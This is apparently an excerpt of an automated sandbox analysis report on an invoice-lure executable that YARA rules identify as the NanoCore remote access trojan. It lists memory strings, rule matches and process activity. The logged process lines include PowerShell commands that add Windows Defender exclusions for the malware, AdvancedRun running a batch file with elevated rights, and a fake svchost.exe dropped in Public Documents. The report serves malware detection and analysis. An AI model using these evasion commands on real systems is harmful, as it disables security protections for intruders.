        Source: svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310709236.000001F773240000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
        Source: svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

        E-Banking Fraud:

        Yara detected Nanocore RAT
        Source: Yara match | File source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Executable has a suspicious name (potential lure to open the executable)
        Source: CN-Invoice-XXXXX9808-19011143287990.exe | Static file information: Suspicious name
        Initial sample is a PE file and has a suspicious name
        Source: initial sample | Static PE information: Filename: CN-Invoice-XXXXX9808-19011143287990.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_08396890 NtSetInformationThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_0839F13B NtSetInformationThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_0839F198 NtSetInformationThread,
        Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_008BCF8C
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_008BCF80
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_008BF030
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_008BD360
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_008BB71C
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_08370040
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_08398EB0
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_08370016
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Code function: 0_2_08398EA1
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe | Code function: String function: 0040B550 appears 50 times
        Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: CN-Invoice-XXXXX9808-19011143287990.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: svchost.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534877445.0000000008320000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534877445.0000000008320000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534487700.0000000008080000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000000.221983662.000000000008A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameWgjnHXED.exe2 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp | Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDXGI QpV.exe2 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.527751547.0000000005B50000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe | Binary or memory string: OriginalFilenameWgjnHXED.exe2 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
        Source: CN-Invoice-XXXXX9808-19011143287990.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: classification engine | Classification label: mal100.troj.evad.winEXE@56/29@6/5
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe | Code function: 8_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe | Code function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe | Code function: 8_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe | Code function: 8_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe | Code function: 8_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | File created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
        Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5604
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{eccd15db-272a-41be-b8cd-5f3fef4189ce}
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_01
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | File created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4
        Source: unknown | Process created: C:\Windows\explorer.exe
        Source: unknown | Process created: C:\Windows\explorer.exe
        Source: unknown | Process created: C:\Windows\explorer.exe
        Source: unknown | Process created: C:\Windows\explorer.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: CN-Invoice-XXXXX9808-19011143287990.exe | ReversingLabs: Detection: 25%
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | File read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
        Source: unknown | Process created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe'
        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380
        Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: unknown | Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
        Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknown | Process created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
        Source: unknown | Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
        Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: unknown | Process created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Process created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\explorer.exe | Process created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
